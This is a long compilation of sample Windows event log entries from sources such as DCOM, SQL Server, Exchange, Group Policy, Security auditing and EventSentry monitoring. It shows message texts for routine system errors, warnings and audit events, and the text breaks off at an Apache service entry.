Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.



Event ID:
Source:
DCOM
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8


Event ID:
Source:
DCOM
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8


Event ID:
Source:
MsiInstaller
Message:
Product: QuickBooks -- Error 1328.Error applying patch to file C:\Config.Msi\PT43.tmp. It has probably been updated by other means, and can no longer be modified by this patch. For more information contact your patch vendor. System Error: -1072807676


Event ID:
Source:
ipnathlp
Message:
The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.


Event ID:
Source:
TermServDevices
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.


Event ID:
Source:
Win32k
Message:
A desktop heap allocation failed.


Event ID:
Source:
RemoteAccess
Message:
The user DOMAIN\User connected to port VPN4-5 has been disconnected because no network protocols were successfully negotiated.


Event ID:
Source:
Server Administrator
Message:
Predictive Failure reported: Array Disk 0:4 Controller 0, Connector 0


Event ID:
Source:
System event log
Category:
Warning
Message:
Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 00508DB42684. The following error occurred:
The semaphore timeout period has expired.. Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.


Event ID:
Source:
Unlocker application
Message:
\Device\UnlockerDriver5/

0000: 00 00 00 00 01 00 68 00 00 00 00 00 36 00 04 80
0001: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0002: 00 00 00 00 00 00 00 00


Event ID:
Source:
EventSentry
Message:
The following 2 service(s) are configured to AUTOSTART but are currently not running:Performance Logs and AlertsVirtual Machine Additions Shared Folder Service


Event ID:
Source:
AutoEnrollment
Message:
Automatic certificate enrollment for local system failed to enroll for one Domain Controller certificate (0x80070005). Access is denied.


Event ID:
Source:
Eventlog
Message:
Microsoft (R) Windows (R) 5.02. 3790 Service Pack 2 Multiprocessor Free.


Event ID:
Source:
MSSQLSERVER
Message:
Login failed for user 'sa'. [CLIENT: 192.168.6.52]



Event ID:
Source:
Tcpip
Message:
The system detected an address conflict for IP address 172.20.5.14 with the system having network hardware address 00:07:E9:40:7C:40. Network operations on this system may be disrupted as a result.


Event ID:
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)



Event ID:
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Installation Error: the installation of the following update has failed with error 0x80070643: Security Update for Microsoft .NET Framework Verion 1.1 Service Pack 1 (KB928366)


Event ID:
Source:
Perflib
Message:
Windows cannot load extensible counter DLL MSSQL$MS_ADMT, the first DWORD in data section is the Windows error code.



Event ID:
Source:
Microsoft-Windows-ApplicationExperienceInfrastructure
Message:
The application (OfficeScan Client, from vendor Trend Micro, INC.) has the following problem: OfficeScan Client is incompatible with this version of Windows. For more information, contact Trend Micro, INC..


Event ID:
Source:
MSSQL$SQLEXPRESS
Message:
SQL Server has encountered 136 occurrence(s) of cachestore flush for the 'Object Plans' cachestore (part of plan cache) due to some database maintenance or reconfigure operations.



Event ID:
Source:
SQLVDI
Message:
SQLVDI: Loc=CVDS::Cleanup. Desc=Release(ClientAliveMutex). ErrorCode=(288)Attempt to release mutex not owned by caller.
. Process=2084. Thread=5976. Client. Instance=. VD=.


Event ID:
Source:
EventSentry
Message:
The following service was removed: CryptSvc4951 (CryptSvc4951). Last service state was Stopped.



Event ID:
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 w3wp.exe, P2 6.0.3790.3959, P3 45d6968e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 416e, P8 a3, P9 system.argumentoutofrange, P10 NIL.



Event ID:
Source:
ASP.NET 2.0.50727.0
Message:
An unhandled exception occurred and the process was terminated.

Application ID: /LM/W3SVC/1694288962/ROOT/ReportingWebService

Process ID: 5568

Exception: System.ArgumentOutOfRangeException

Message: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index

StackTrace:
Server stack trace:
at System.Collections.ArrayList.get_Item(Int32 index)
at System.Collections.Specialized.StringCollection.get_Item(Int32 index)
at Microsoft.UpdateServices.Internal.Reporting.ExtendedData.ToString()
at Microsoft.UpdateServices.Internal.Reporting.ReportingEvent.ToString()
at Microsoft.UpdateServices.Internal.Reporting.DebugEventHandler.HandleEvent(IReportingInformation[] itemList)
at System.Runtime.Remoting.Messaging.StackBuilderSink._PrivateProcessMessage(IntPtr md, Object[] args, Object server, Int32 methodPtr, Boolean fExecuteInContext, Object[]


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
The AGENT status of host <HOSTNAME> (<GROUP>) remains at ERROR due to error "Access is denied.
".


Event ID:
Source:
TermServDevices
Message:
Driver HP Color LaserJet 4600 PCL 6 required for printer !!swpma1fs1!MA1-POINT-COLOR-HP4600 is unknown. Contact the administrator to install the driver before you log in again.


Event ID:
Source:
Security
Category:
Object Access
Message:
Object Access Attempt:
Object Server: Security
Handle ID: 9780
Object Type: File
Process ID: 904
Image File Name: C:\WINDOWS\system32\svchost.exe
Accesses: WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)

Access Mask: 0x6


Event ID:
Source:
Application Error
Message:
Faulting application eventsentry_svc.exe, version 2.60.0.130, faulting module eventsentry_svc.exe, version 2.60.0.130, fault address 0x0002eafa.



Event ID:
Source:
EventSentry
Category:
Software Monitoring
Message:
Application 86C01576-F161-3624-9462-D87DE3243DC4 (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.



Event ID:
Source:
.NET Runtime Optimization Service
Message:
.NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: Microsoft.ReportingServices.QueryDesigners, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 . Error code = 0x80070002


Event ID:
Source:
Srv
Message:
The server was unable to allocate from the system paged pool because the pool was empty.


Event ID:
Source:
ESE
Category:
Logging/Recovery
Message:
Information Store (284) First Storage Group: Attempted to attach database 'D:\Program Files\Exchsrvr\MDBDATA\priv1.EDB' but it is a database restored from a backup set on which hard recovery was not started or did not complete successfully.


Event ID:
Source:
MSExchangeIS
Category:
General
Message:
Error 0xfffffde0 starting database "First Storage Group\Mailbox Store (SERVER)" on the Microsoft Exchange Information Store.


Event ID:
Source:
MSExchangeSA
Category:
MAPI Session
Message:
The MAPI call 'OpenMsgStore' failed with the following error:
The attempt to log on to the Microsoft Exchange Server computer has failed.
The MAPI provider failed.
Microsoft Exchange Server Information Store
ID no: 8004011d-0512-00000000


Event ID:
Source:
Microsoft-Windows-Perflib
Message:
The data buffer created for the "VMware" service in the "C:\Program Files\VMware\VMware Server\vmPerfmon.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.


Event ID:
Source:
Perflib
Message:
The configuration information of the performance library "C:\WINDOWS\system32\aspperf.dll | infoctrs.dll | perfts.dll" for the "ASP | InetInfo | TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
Unprotection of auditable protected data.
Data Description:
Key Identifier: 575dfb1a-2f3a-4cdd-a08c-5e2bf47579ed
Protected Data Flags: 0x0
Protection Algorithms: 3DES-168 , SHA1-160
Failure Reason: 0x8009000B


Event ID:
Source:
MSExchangeIS Public Store
Category:
Access Control
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.



Event ID:
Source:
ati2mtag
Message:
I2c return failed


Event ID:
Source:
Microsoft-Windows-Kerberos-Key-Distribution-Center
Message:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.


Event ID:
Source:
nv
Message:
Unknown error on L1 -> L0



Event ID:
Source:
DNS
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.


Event ID:
Source:
EventSentry
Category:
Software Monitoring
Message:
Application 3087B10A-0736-6446-6DF0-F69FB0A3D2DA (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.


Event ID:
Source:
Windows Update Agent
Category:
Installation
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Update for .NET Framework 3.0: x86 (KB932471).


Event ID:
Source:
Disk
Message:
An error was detected on device \Device\Harddisk3\D during a paging operation.



Event ID:
Source:
NTDS Replication
Message:
The Windows NT 4.0 or earlier replication checkpoint with the PDC emulator master was unsuccessful.

A full synchronization of the security accounts manager (SAM) database to domain controllers running Windows NT 4.0 and earlier might take place if the PDC emulator master role is transferred to the local domain controller before the next successful checkpoint.

The checkpoint process will be tried again in four hours.

Additional Data
Error value:
1722 The RPC server is unavailable.



Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows attempted to read the file \\mydomain.local\SysVol\mydomain.local\Policies\D3610029-D721-41DA-ACE6-FD0CAF521432\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.


Event ID:
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
490684
Application
Warning
Office SharePoint Server
Office Server Shared Services
6801
REPORT
5/28/2008 12:00:01 AM
The OSS SQM Data Collection Job encountered a problem.

Reason: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.

Technical Support Details:
System.IO.FileNotFoundException: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone, SPUserToken userToken)
at Microsoft.SharePoint.SPSite..ctor(Guid id, SPFarm farm, SPUrlZone zone)
at Microsoft.SharePoint.SPSite.LookupUriInRemoteFarm(SPFarm farm, Guid id, SPUrlZone zone)
at Microsoft.Office.Server.Administration.SharedResourceProvider.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.ServerContext.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.Audience.AudienceSiteInfo..ctor(ServerContext serverContext, Boolean bCentral, Boolean bPublic, AudienceAccessRights AccessRights)
at Microsoft.Office.Server.Audience.AudienceManager.get_Audiences()
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordAudienceApplicationSspData(SharedResourceProvider ssp)
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordSspData(SharedResourceProvider ssp)



Event ID:
Source:
EventSentry
Message:
Free disk space for drive T:\ (ISBORA8_T) is below the configured limit of 2 percent. 2.00 percent of disk space (10239 Mb) are currently available on drive T:\.


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Visual Studio 2005 Professional Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\a4cb8.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.


Event ID:
Source:
w32time
Message:
The NTP server (null) isn't sync'd, time not set



Event ID:
Source:
Service Control Manager
Message:
The APC UPS Service service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.


Event ID:
Source:
Microsoft-Windows-WMI
Message:
Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.



Event ID:
Source:
Security
Category:
Account Management
Message:
User Account Unlocked:
Target Account Name: gwashington
Target Domain: USA
Target Account ID: USA\gwashington
Caller User Name: sys.admin
Caller Domain: USA
Caller Logon ID: (0x0,0x41708D37)


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other System Events
Message:
Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.

Error Code: 2


Event ID:
Source:
Userenv
Message:
Windows cannot query for the list of Group Policy objects. Check the event log for possible messages previously logged by the policy engine that describes the reason for this.


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: My Name
Domain: MYDOMAIN
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: WORKSTATION


Event ID:
Source:
EventSentry
Message:
Free disk space for drive C:\ () is back above the configured limit of 500 Mb. 2389 Mb of disk space are currently available on drive C:\.


Event ID:
Source:
Microsoft Office 12
Message:
EventType office11shipassert, P1 1be6, P2 12.0.6215.0, P3 NIL, P4 NIL, P5 NIL, P6 NIL, P7 NIL, P8 NIL, P9 NIL, P10 NIL.



Event ID:
Source:
Windows SharePoint Services 3
Category:
Timer
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID 693fe0b2-6c9f-47bf-9d1a-c6a2aa7cd3c3) threw an exception. More information is included below.

Attempted to read or write protected memory. This is often an indication that other memory is corrupt.



Event ID:
Source:
NtServicePack
Message:
Windows XP Service Pack 3 installation failed.
Access is denied.


Event ID:
Source:
POP3SVC
Category:
Content Engine
Message:
Error 0x7d6 occurred while rendering message 0008-0000008949b3 for download for user user@emaildomain.com.


Event ID:
Source:
Security
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.

Name: -
Path: C:\WINDOWS\system32\someprocess.exe
Process identifier: 3732
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 55751
Allowed: No
User notified: No


Event ID:
Source:
ActiveDocs Enterprise - Web Wizard
Message:
Error occured InitializeDeliveryServices services.Thread was being aborted. at DocumentDelivery.CheckQueues.CheckQueues() at DocumentDelivery.DeliveryServicesMonitor.RefreshDeliveryServices() at DocumentDelivery.DeliveryServicesMonitor.InitializeDeliveryServices() -


Event ID:
Source:
ActiveDocs Enterprise - Web Wizard
Message:
An error occured in the ActiveDocs Enterprise Service while checking queues for the database 'activedocs' on Server 'PROV109\ACTIVEDOCS' [D:\Applications\ActiveDocs\DocGenerator\activedocs.config]. Thread was being aborted. at WWTManager.WWTManager.CheckConversionAndDeliveryTimeOuts() at DocumentDelivery.CheckQueues.CheckQueues() - PROV109\ACTIVEDOCS - activedocs


Event ID:
Source:
EvntAgnt
Message:
SNMP Event Log Extension Agent did not initialize correctly.


Event ID:
Source:
EvntAgnt
Message:
Error processing registry parameters. Extension agent terminating.


Event ID:
Source:
EvntAgnt
Message:
Error positioning to end of log file -- seek to end of log failed. Handle specified is 635992. Return code from ReadEventLog is 1500.


Event ID:
Source:
EvntAgnt
Message:
SNMP Event Log Extension Agent did not initialize correctly.


Event ID:
Source:
EventSentry
Message:
Host ACLXIDS (Servers) changed its PING status from ERROR to OK. The reason for the status change was: 'Ping Successful (Rate:100%, Avg:0ms, Max:0ms, Min:0ms)'.


Event ID:
Source:
TermServDevices
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.



Event ID:
Source:
MRxSmb
Message:
The redirector failed to determine the connection type.


Event ID:
Source:
Ntfs
Category:
2
Message:
The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume NAME_OF_VOLUME.


Event ID:
Source:
MSSQL$ACTIVEDOCS
Message:
3041 :BACKUP failed to complete the command BACKUP DATABASE [activedocs] TO DISK = N'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK' WITH INIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT


Event ID:
Source:
MSSQL$ACTIVEDOCS
Message:
18210 :BackupMedium::ReportIoError: write failure on backup device 'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK'. Operating system error 112(There is not enough space on the disk.).


Event ID:
Source:
snort
Message:
[1:1201:7] ATTACK-RESPONSES 403 Forbidden [Classification: Attempted Information Leak] [Priority: 2]: {TCP} 192.168.20.20:80 -> 216.86.148.242:48121


Event ID:
Source:
Security
Category:
Account Logon
Message:
Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: johndoe
Source Workstation:
Error Code: 0xC0000071



Event ID:
Source:
SQLISPackage
Message:
Package 'transbackup' failed.


Event ID:
Source:
Security
Message:
The audit log was cleared Primary User Name: SYSTEM Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) Client User Name: nsi Client Domain: NSISENTRYTBOH Client Logon ID: (0x0,0x2568E)


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The Group Policy Client Side Extension Software Installation was unable to apply one or more settings because the changes must be processed before system startup or user logon. The system will wait for Group Policy processing to finish completely before the next startup or logon for this user, and this may result in slow startup and boot performance.


Event ID:
Source:
Application Management Group Policy
Message:
The removal of the assignment of application MySQL Connector/ODBC 5.1 from policy Software Installation failed. The error was : The system cannot find the file specified.


Event ID:
Source:
Application Management Group Policy
Message:
Failed to apply changes to software installation settings. The installation of software deployed through Group Policy for this user has been delayed until the next logon because the changes must be applied before the user logon. The error was : The group policy framework should call the extension in the synchronous foreground policy refresh.


Event ID:
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize because the processing of notifications could not be setup. Error code [0x80004005]. Verify that no other applications are currently bound to UDP port [2883], or try specifying a different port number.


Event ID:
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize. Error code: [0x80004005].


Event ID:
Source:
Backup Exec
Message:
Backup Exec Alert: Job Cancellation
(Server: "servername") (Job: "Daily") The job was canceled because the response to a media request alert was Cancel, or because the alert was configured to automatically respond with Cancel, or because the Backup Exec Job Engine service was stopped.

For more information, click the following link:
http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml



Event ID:
Source:
Ci
Category:
CI Service
Message:
Cleaning up corrupt content index metadata on d:\system volume information\catalog.wci. Index will be automatically restored by refiltering all documents.


Event ID:
Source:
Security
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lgreenle Domain: mlsnet.local Logon Type: 7 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 9204 Transited Services: - Source Network Address: 192.168.0.76 Source Port: 39647


Event ID:
Source:
Security
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lward Domain: Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 15676 Transited Services: - Source Network Address: 192.168.0.85 Source Port: 2235


Event ID:
Source:
NtFrs
Message:
Der Dateireplikationsdienst liest die Daten in den Systemdatenträger ein. Der Computer "SRV2" kann nicht zum Domänencontroller benannt werden, bis dieser Vorgang beendet ist. Das Systemvolumen wird dann unter SYSVOL freigegeben.

Um die SYSVOL-Freigabe zu überprüfen, geben Sie an der Eingabeaufforderung folgendes ein:
net share

Wenn der Dateireplikationsdienst den Scanvorgang beendet, erscheint die SYSVOL-Freigabe.

Die Initialisierung des Systemdatenträgers kann einige Zeit in Anspruch nehmen. Der Zeitaufwand ist von der Datenmenge im Systemdatenträger abhängig.



Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "PhysicalDisk(*)\Avg. Disk Queue Length" could not be monitored due to error "0xC0000BB8". Please make sure that the performance counter exists. If you are running a non-english version of Windows then performance counters are named in the language of the Operating System.


Event ID:
Source:
volsnap
Message:
The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.


Event ID:
Source:
Folder Redirection
Message:
Failed to perform redirection of folder Application Data. The new directories for the redirected folder could not be created. The folder is configured to be redirected to <\\MD61NTFS100\Home\%USERNAME%\Application Data>, the final expanded path was <\\MD61NTFS100\Home\E385776\Application Data>. The following error occurred: The system cannot find the path specified.


Event ID:
Source:
SideBySide
Message:
Activation context generation failed for "C:\someapp.exe". Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found. Please use sxstrace.exe for detailed diagnosis


Event ID:
Source:
EventSentry
Message:
The Windows PowerShell event log could not be cleared and backed up to file \\FS1\DEPARTMENTS\TECHNOLOGY\PRIVATE\EVENTLOGBACKUPS\VMUTIL WINDOWS POWERSHELL 04 11 2008 12 07.EVT due to the following error:

Access is denied.
.



Event ID:
Source:
MySQL
Message:
Aborted connection 231292 to db: 'mydatabase' user: 'dbuser' host: '192.168.1.123' (Got an error reading communication packets)



Event ID:
Source:
EventSentry
Message:
Action "Desktop" was unable to create a mailslot for host "." due to error: The system cannot find the file specified.


Event ID:
Source:
VWServicesPA
Message:
Source: Process AnalyzerCube Processing Status: DTSRun: Loading...DTSRun: Executing...DTSRun OnStart: DTSStep_DTSOlapProcess.Task_1DTSRun OnError: DTSStep_DTSOlapProcess.Task_1, Error = -2147221384 (80040078) Error string: More than the maximum of 64,000 dimension member children for a single parent (dimension 'Zaaknummer', level 'Zaaknummer', member '141715'). Error source: Zaaknummer Help file: Help context: 1000440Error Detail Records:Error: 0 (0)


Event ID:
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID a778c03a-b4d5-47ad-b0d5-6130b9c8ba14) threw an exception. More information is included below.

Attempted to read or write protected memory. This is often an indication that other memory is corrupt.



Event ID:
Source:
MSExchangeIS
Message:
Mapi session '/O=Stercomm/OU=Amsterdam/cn=Recipients/cn=OBlanc' exceeded the maximum of 500 objects of type 'objtFolder'. For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
atikmdag
Category:
CRT
Message:
CRT invalid display type


Event ID:
Source:
KDC
Message:
There are multiple accounts with name MSSQLSvc/venus.partnershipassurance.int:3038 of type DS_SERVICE_PRINCIPAL_NAME.


Event ID:
Source:
MSExchangeTransport
Message:
A non-delivery report with a status code of 5.3.0 was generated for recipient rfc822


Event ID:
Source:
Application Error
Message:
Faulting application NICA.exe, version 1.1.0.60823, faulting module NICA.exe, version 1.1.0.60823, fault address 0x0002af39.



Event ID:
Source:
EventSentry
Message:
Host SCISTONETBOTZ (EMEA Netbotz) changed its PING status from OK to ERROR. The reason for the status change was: "100% packets lost".



Event ID:
Source:
disk
Message:
The driver disabled the write cache on device \Device\Harddisk0\DR0.


Event ID:
Source:
Tcpip
Message:
TCP/IP has chosen to restrict the scale factor due to a network condition. This could be related to a problem in a network device and will cause degraded throughput.



Event ID:
Source:
Service Control Manager
Category:
None
Message:
Timeout (30000 milliseconds) waiting for the hpqwmiex service to connect.


Event ID:
Source:
Backup Exec
Category:
1
Message:
Adamm Mover Error: Unload Rewind Failure!
Error = ERROR_IO_DEVICE
Drive = "HP 2"
2E6FDCE6-51A8-4918-B499-9233C643E041
Media = ""
00000000-0000-0000-0000-000000000000
Read Mode: SingleBlock(0), ScsiPass(0)
Write Mode: SingleBlock(1), ScsiPass(1)



Event ID:
Source:
MS ExchangeIS Mailbox
Category:
Rules
Message:
Error 1245 while disabling rule on public folder with rule ID <rule id number>. The folder ID of the public folder is in the data section of this event.


Event ID:
Source:
ClusSvc
Category:
Failover Mgr
Message:
Cluster resource <resource> in Resource Group <group> failed.


Event ID:
Source:
Windows Server Update
Category:
Clients
Message:
Self-update is not working


Event ID:
Source:
Share Point Portal Administration
Category:
None
Message:
An exception occured in the search synchronizer.


Event ID:
Source:
Microsoft-Windows-WPD-MTPClassDriver
Category:
Driver Initilization.
Message:
MTP WPD Driver has failed to start. Error 0x8007001f.


Event ID:
Source:
NETLOGON
Message:
The Netlogon service could not read a mailslot message from The system cannot find the path specified. due to the following error:
03000000


Event ID:
Source:
.NET Runtime 2.0 Error Reporting
Category:
None
Message:
EventType clr20r3, P1 toad.exe, P2 0.0.0.0, P3 46deb19e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 f46, P8 0, P9 n3ctrye2kn3c34sgl4zqyrbfte4m13nb, P10 NIL.



Event ID:
Source:
Sharepoint server 2007
Category:
Publishing Cache
Message:
Unable to connect publishing custom string handler for output caching. IIS Instance Id is '762598284', Url is 'http://spoint2007/....html'.


Event ID:
Source:
NetBT
Category:
Error
Message:
The name "DomainName :1d" could not be registered on the Interface with IP address w.x.y.z. The machine with the IP address w.x.y.a did not allow the name to be claimed by this machine.



Event ID:
Source:
EventSentry
Category:
None
Message:
Action "MSSQL Database", invoked by feature, "Performance Monitoring" was unable to connect to the database due to error "[HYT00] [Microsoft][ODBC SQL Server Driver]Timeout expired (0)". EventSentry will queue events and continue to attempt the delivery of events.


Event ID:
Source:
Wins
Message:
EVENT # 2521
EVENT LOG System
EVENT TYPE Error
SOURCE Wins
EVENT ID 4204
COMPUTERNAME FDS-NT5
DATE / TIME 2/12/2009 8:56:27 AM
MESSAGE WINS could not read from the User Datagram Protocol (UDP) socket.
BINARY DATA 0000: 01 15 00 00 46 27 00 00



Event ID:
Source:
Security
Message:
Category Logon/Logoff
Type: success A
NT AUTHORITY\ANONYMOUS LOGON
Successful Network Logon:
User Name:
Domain:
Logon ID: (0x0,0x265B7)
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name:
Logon GUID: -


Event ID:
Source:
LSASRV
Category:
SPNEGO (Negotiator)
Message:
The Security System detected an authentication error for the server cifs/SERVER.domain.local. The failure code from authentication protocol Kerberos was "The specified user does not exist.
(0xc0000064)".


Event ID:
Source:
Report Server Windows Service (EVENTSENTRY)
Category:
Startup/Shutdown
Message:
The report server database is an invalid version.


Event ID:
Source:
Application Popup
Message:
An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry.


Event ID:
Source:
User Profile Service
Message:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.

DETAIL -
2 user registry handles leaked from \Registry\User\S-1-5-21-3955188477-656860062-1151124159-1021:
Process 6540 (\Device\HarddiskVolume3\Windows\System32\winlogon.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021
Process 1356 (\Device\HarddiskVolume3\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021\Printers\DevModePerUser



Event ID:
Source:
MSSOAP
Message:
Soap error: Restoring data into SoapMapper GetAuthenticationTicketResult failed.


Event ID:
Source:
MSSOAP
Message:
Soap error: Unspecified client error..


Event ID:
Source:
idsvc
Message:
Service stopped successfully.


Event ID:
Source:
spoolerwin32spl
Message:
The print spooler failed to reopen an existing printer connection because it could not read the configuration information from the registry key S-1-5-18\Printers\Connections. The print spooler could not open the registry key. This can occur if the registry key is corrupt or missing, or if the registry recently became unavailable.


Event ID:
Source:
APCPBEAgent
Message:
"Insufficient Runtime Available"


Event ID:
Source:
cpqasm2
Message:
Memory module #5 has exceeded its threshold of correctable errors. Subsequent correctable memory errors will continue to be corrected.


Event ID:
Source:
APCPBEAgent
Message:
"AVR Trim Active"


Event ID:
Source:
Windows Search Service
Category:
Gatherer
Message:
A document ID cannot be allocated.
Context: Windows Application, SystemIndex Catalog
Details:
The content index server cannot update or access information because of a database error. Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases it may be necessary to delete and recreate the content index. (0x8004117f)



Event ID:
Source:
DnsApi
Message:
The system failed to register host (A or AAAA) resource records (RRs) for network adapter
with settings:

Adapter Name : 27E49756-7394-4750-8CDC-8D3EAF944953
Host Name : YOURSERVER
Primary Domain Suffix : yourdomain.local
DNS server list :
192.168.2.10, 192.168.2.11
Sent update to server : 192.168.2.10:53
IP Address(es) :
192.168.2.95

The reason the system could not register these RRs was because of a security related problem. The cause of this could be (a) your computer does not have permissions to register and update the specific DNS domain name set for this adapter, or (b) there might have been a problem negotiating valid credentials with the DNS server during the processing of the update request.

You can manually retry DNS registration of the network adapter and its settings by typing "ipconfig /registerdns" at the command prompt. If problems still persist, contact your DNS server or network systems administrator. For specific error code, see the record data displayed below.


Event ID:
Source:
DhcpServer
Message:
Scope, 192.168.1.0, is 95 percent full with only 1 IP addresses remaining.


Event ID:
Source:
Apache Service
Message:
The Apache service named reported the following error:
